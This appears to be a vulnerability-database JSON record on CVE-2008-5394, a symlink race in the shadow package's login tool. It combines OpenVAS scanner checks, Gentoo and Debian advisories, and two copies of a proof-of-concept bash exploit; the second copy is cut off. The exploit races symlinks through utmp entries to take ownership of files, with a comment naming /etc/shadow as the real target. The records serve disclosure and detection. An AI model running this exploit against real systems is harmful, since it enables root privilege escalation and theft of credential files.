script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~8.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~9.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~17.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.3~8.3.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.12~2.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"shadow-utils\", rpm:\"shadow-utils~4.0.3~8.3.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-24.", "modified": "2018-04-06T00:00:00", "published": "2009-03-13T00:00:00", "id": "OPENVAS:136141256231063555", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063555", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-24 (shadow)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"An insecure temporary file usage in Shadow may allow local users to gain\nroot privileges.\";\ntag_solution = \"All Shadow users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-apps/shadow-4.1.2.2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-24\nhttp://bugs.gentoo.org/show_bug.cgi?id=251320\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-24.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63555\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 19:24:56 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2008-5394\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-24 (shadow)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"sys-apps/shadow\", unaffected: make_list(\"ge 4.1.2.2\"), vulnerable: make_list(\"lt 4.1.2.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-24.", "modified": "2017-07-07T00:00:00", "published": "2009-03-13T00:00:00", "id": "OPENVAS:63555", "href": "http://plugins.openvas.org/nasl.php?oid=63555", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-24 (shadow)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"An insecure temporary file usage in Shadow may allow local users to gain\nroot privileges.\";\ntag_solution = \"All Shadow users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-apps/shadow-4.1.2.2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-24\nhttp://bugs.gentoo.org/show_bug.cgi?id=251320\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-24.\";\n\n \n \n\nif(description)\n{\n script_id(63555);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 19:24:56 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2008-5394\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-24 (shadow)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 
E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"sys-apps/shadow\", unaffected: make_list(\"ge 4.1.2.2\"), vulnerable: make_list(\"lt 4.1.2.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-695-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "id": "OPENVAS:840229", "href": "http://plugins.openvas.org/nasl.php?oid=840229", "type": "openvas", "title": "Ubuntu Update for shadow vulnerability USN-695-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_695_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for shadow vulnerability USN-695-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This 
program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Szabo discovered a race condition in login. While setting up\n tty permissions, login did not correctly handle symlinks. If a local\n attacker were able to gain control of the system utmp file, they could\n cause login to change the ownership and permissions on arbitrary files,\n leading to a root privilege escalation.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-695-1\";\ntag_affected = \"shadow vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 7.10 ,\n Ubuntu 8.04 LTS ,\n Ubuntu 8.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-695-1/\");\n script_id(840229);\n script_cve_id(\"CVE-2008-5394\");\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"695-1\");\n script_name( \"Ubuntu Update for shadow vulnerability USN-695-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"login\", ver:\"4.0.13-7ubuntu3.4\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"passwd\", ver:\"4.0.13-7ubuntu3.4\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"login\", ver:\"4.1.1-1ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"passwd\", ver:\"4.1.1-1ubuntu1.2\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"login\", ver:\"4.0.18.2-1ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"passwd\", ver:\"4.0.18.2-1ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"login\", ver:\"4.0.18.1-9ubuntu0.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"passwd\", ver:\"4.0.18.1-9ubuntu0.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:01", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5394"], "description": "### Background\n\nShadow is a set of tools to deal with user accounts. \n\n### Description\n\nPaul Szabo reported a race condition in the \"login\" executable when setting up tty permissions. \n\n### Impact\n\nA local attacker belonging to the \"utmp\" group could use symlink attacks to overwrite arbitrary files and possibly gain root privileges. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Shadow users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-apps/shadow-4.1.2.2\"", "edition": 1, "modified": "2009-03-10T00:00:00", "published": "2009-03-10T00:00:00", "id": "GLSA-200903-24", "href": "https://security.gentoo.org/glsa/200903-24", "type": "gentoo", "title": "Shadow: Privilege escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T01:55:57", "description": "Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC. CVE-2008-5394. 
Local exploit for linux platform", "published": "2008-12-01T00:00:00", "type": "exploitdb", "title": "Debian GNU/Linux symlink attack in login Arbitrary File Ownership PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5394"], "modified": "2008-12-01T00:00:00", "id": "EDB-ID:7313", "href": "https://www.exploit-db.com/exploits/7313/", "sourceData": "#!/bin/bash -\n\necho '\n\t#include <string.h>\n\t#include <stdlib.h>\n\t#include <unistd.h>\n\t#include <utmp.h>\n\t#include <sys/types.h>\n\t#include <stdio.h>\n\n\tint main(int argc, char *argv[])\n\t{\n\t struct utmp entry;\n\t int i;\n\n\t entry.ut_type=LOGIN_PROCESS;\n\t strcpy(entry.ut_line,\"/tmp/x\");\n\t entry.ut_time=0;\n\t strcpy(entry.ut_user,\"badguy\");\n\t strcpy(entry.ut_host,\"badhost\");\n\t entry.ut_addr=0;\n\t for(i=1;i<9;i++) {\n\t entry.ut_pid=(pid_t)( i + (int)getpid() );\n\t sprintf(entry.ut_id,\"bad%d\",i);\n\t pututline(&entry);\n\t }\n\t}\n' > /tmp/fillutmp.c\n\ncc -o /tmp/fillutmp /tmp/fillutmp.c\n\necho 'Ask someone with group utmp privileges to do:'\necho ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'\necho -n 'Press [RETURN] to continue... '\nread ANS\n\necho '\n\t#include <unistd.h>\n\n\tint main(int argc, char *argv[])\n\t{\n\t while(1)\n\t {\n\t unlink(\"/tmp/x\");\n\t symlink(argv[1],\"/tmp/x\");\n\t unlink(\"/tmp/x\");\n\t symlink(argv[2],\"/tmp/x\");\n\t }\n\t}\n' > /tmp/jigglelnk.c\n\ncc -o /tmp/jigglelnk /tmp/jigglelnk.c\n\nHOST=`hostname` # or simply localhost?\necho \"Which tty do you think a 'telnet $HOST' will use next?\"\necho \"(Do that telnet and see...)\"\nread TTY\necho \"You said it will be '$TTY' ...\"\n\nATK=/etc/debian_version # should be /etc/shadow\n\necho \"Starting symlink re-jiggler ...\"\n/tmp/jigglelnk $TTY $ATK &\nJIG=$!\n\nLOOP=0\nwhile :; do\n ((LOOP = $LOOP + 1))\n echo; echo; echo \"Try = $LOOP\"\n\n /tmp/fillutmp\n\n echo \"Telnetting... 
if login succeeds, just exit for next try...\"\n /usr/bin/telnet $HOST\n\n LS=`ls -ld $ATK`\n case \"$LS\" in\n *root*root* ) ;; # not done yet...\n * )\n echo; echo\n echo \"Success after $LOOP tries!\"\n echo \"$LS\"\n echo; echo\n break\n ;;\n esac\ndone\n\nkill $JIG\nrm /tmp/fillutmp /tmp/jigglelnk /tmp/x\n\n# ...\n# ~$ logout\n# Connection closed by foreign host.\n# Success after 12 tries!\n# -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version\n\n# milw0rm.com [2008-12-01]\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7313/"}], "debian": [{"lastseen": "2020-11-11T13:18:34", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5394"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1709-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nJanuary 21, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : shadow\nVulnerability : race condition\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-5394\nDebian Bug : 505271\n\nPaul Szabo discovered that login, the system login tool, did not\ncorrectly handle symlinks while setting up tty permissions. 
If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary files,\nleading to a root privilege escalation.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 4.0.18.1-7+etch1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.1.1-6.\n\nWe recommend that you upgrade your shadow package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/s/shadow/shadow_4.0.18.1.orig.tar.gz\n Size/MD5 checksum: 2354234 3f54eaa3a35e7c559f4def92e9957581\n http://security.debian.org/pool/updates/main/s/shadow/shadow_4.0.18.1-7+etch1.diff.gz\n Size/MD5 checksum: 297817 b78d9d738765da65a6b55dea102569c3\n http://security.debian.org/pool/updates/main/s/shadow/shadow_4.0.18.1-7+etch1.dsc\n Size/MD5 checksum: 1406 ec01ac54e482ea552fdae5753d6c1745\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_alpha.deb\n Size/MD5 checksum: 810680 329e1cd5ad019d3984411b1a8a5c77ad\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_alpha.deb\n Size/MD5 checksum: 943992 76690a44c565b4594892bab69eaf7e30\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_amd64.deb\n Size/MD5 checksum: 867696 4ce4e2f7884cd883729123163930b9dc\n 
http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_amd64.deb\n Size/MD5 checksum: 806412 3a6171d83a4b79846fe4831b02007a4b\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_arm.deb\n Size/MD5 checksum: 778766 df6126b8cd29de54831976a24d28589e\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_arm.deb\n Size/MD5 checksum: 791770 a9e7b122a8f9a7944bfc91b7cec77554\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_hppa.deb\n Size/MD5 checksum: 847846 8562b322610062eb31689e467d80ff7c\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_hppa.deb\n Size/MD5 checksum: 804082 af4a3f06a93be5cea7dd7dfeed8eed1b\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_i386.deb\n Size/MD5 checksum: 792460 82c630b2f4e18217170a73a2dab27cba\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_i386.deb\n Size/MD5 checksum: 796578 439cd50477db064cdf11d9b48c0e9af0\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_ia64.deb\n Size/MD5 checksum: 1048736 79434b796109c1565f0f0be3cb8d06f0\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_ia64.deb\n Size/MD5 checksum: 826456 13df2a0a071f407c84b25ae3ed6077bc\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_mips.deb\n Size/MD5 checksum: 804530 0523d4220e9cb7e8b2342a0a33c1e989\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_mips.deb\n Size/MD5 checksum: 899612 597b58ea81e074bae374b412f28e1252\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_mipsel.deb\n Size/MD5 checksum: 908860 
ade3427a1b8b693a098544ac27ae17aa\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_mipsel.deb\n Size/MD5 checksum: 805100 fd9d9e49cd9b7864b06865c097f0ba08\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_powerpc.deb\n Size/MD5 checksum: 805442 c8f8683c70aabfbea99f27115afda81e\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_powerpc.deb\n Size/MD5 checksum: 856164 16db8928aa4424f57372e32b23b7de58\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_s390.deb\n Size/MD5 checksum: 820700 2cd319907d34afe08918cd5f93461f60\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_s390.deb\n Size/MD5 checksum: 804200 4851f0e0fa27d5786353b6235316215a\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_sparc.deb\n Size/MD5 checksum: 800196 19f9b82843f53040d2083e348d0300d4\n http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_sparc.deb\n Size/MD5 checksum: 789552 ae637bec3b696937705a094db261e973\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 7, "modified": "2009-01-21T10:03:50", "published": "2009-01-21T10:03:50", "id": "DEBIAN:DSA-1709-1:DE4E6", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00016.html", "title": "[SECURITY] [DSA 1709-1] New shadow packages fix privilege escalation", "type": "debian", 
"cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T19:03:55", "description": "BUGTRAQ ID: 32552\r\nCVE(CAN) ID: CVE-2008-5394\r\n\r\nDebian\u662f\u4e00\u4e2a\u6d41\u884c\u7684Linux\u53d1\u884c\u7248\u672c\u3002\r\n\r\nDebian\u53ca\u5176\u4ed6\u4e00\u4e9bLinux\u7248\u672c\u7684login\u8f6f\u4ef6\u5305\u6ca1\u6709\u5b89\u88c5\u7684\u521b\u5efa\u4e34\u65f6\u6587\u4ef6\u3002utmp\u7ec4\u4e2d\u7684\u672c\u5730\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u521b\u5efa\u4ece\u4e34\u65f6\u6587\u4ef6\u5230\u7cfb\u7edf\u4e2d\u5404\u79cd\u6587\u4ef6\u7684\u7b26\u53f7\u94fe\u63a5\u6765\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u4ee5\u63d0\u5347\u7684\u6743\u9650\u8986\u76d6\u7cfb\u7edf\u4e0a\u7684\u4efb\u610f\u6587\u4ef6\u3002\n\nDebian Linux 4.0\r\nDebian Linux 3.1\r\nDebian Linux 3.0\r\nUbuntu Linux 8.10\r\nUbuntu Linux 8.04\r\nUbuntu Linux 7.10\r\nUbuntu Linux 6.06 LTS\n Debian\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://www.debian.org/security/ target=_blank>http://www.debian.org/security/</a>", "published": "2008-12-19T00:00:00", "type": "seebug", "title": "Debian Linux /bin/login\u8f6f\u4ef6\u5305\u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5394"], "modified": "2008-12-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4572", "id": "SSV:4572", "sourceData": "\n #!/bin/bash -\r\n\r\necho '\r\n\t#include <string.h>\r\n\t#include <stdlib.h>\r\n\t#include <unistd.h>\r\n\t#include <utmp.h>\r\n\t#include <sys/types.h>\r\n\t#include <stdio.h>\r\n\r\n\tint main(int argc, char *argv[])\r\n\t{\r\n\t struct utmp entry;\r\n\t int i;\r\n\r\n\t entry.ut_type=LOGIN_PROCESS;\r\n\t strcpy(entry.ut_line,"/tmp/x");\r\n\t entry.ut_time=0;\r\n\t strcpy(entry.ut_user,"badguy");\r\n\t 
strcpy(entry.ut_host,"badhost");\r\n\t entry.ut_addr=0;\r\n\t for(i=1;i<9;i++) {\r\n\t entry.ut_pid=(pid_t)( i + (int)getpid() );\r\n\t sprintf(entry.ut_id,"bad%d",i);\r\n\t pututline(&entry);\r\n\t }\r\n\t}\r\n' > /tmp/fillutmp.c\r\n\r\ncc -o /tmp/fillutmp /tmp/fillutmp.c\r\n\r\necho 'Ask someone with group utmp privileges to do:'\r\necho ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'\r\necho -n 'Press [RETURN] to continue... '\r\nread ANS\r\n\r\necho '\r\n\t#include <unistd.h>\r\n\r\n\tint main(int argc, char *argv[])\r\n\t{\r\n\t while(1)\r\n\t {\r\n\t unlink("/tmp/x");\r\n\t symlink(argv[1],"/tmp/x");\r\n\t unlink("/tmp/x");\r\n\t symlink(argv[2],"/tmp/x");\r\n\t }\r\n\t}\r\n' > /tmp/jigglelnk.c\r\n\r\ncc -o /tmp/jigglelnk /tmp/jigglelnk.c\r\n\r\nHOST=`hostname` # or simply localhost?\r\necho "Which tty do you think a 'telnet $HOST' will use next?"\r\necho "(Do that telnet and see...)"\r\nread TTY\r\necho "You said it will be '$TTY' ..."\r\n\r\nATK=/etc/debian_version # should be /etc/shadow\r\n\r\necho "Starting symlink re-jiggler ..."\r\n/tmp/jigglelnk $TTY $ATK &\r\nJIG=$!\r\n\r\nLOOP=0\r\nwhile :; do\r\n ((LOOP = $LOOP + 1))\r\n echo; echo; echo "Try = $LOOP"\r\n\r\n /tmp/fillutmp\r\n\r\n echo "Telnetting... 
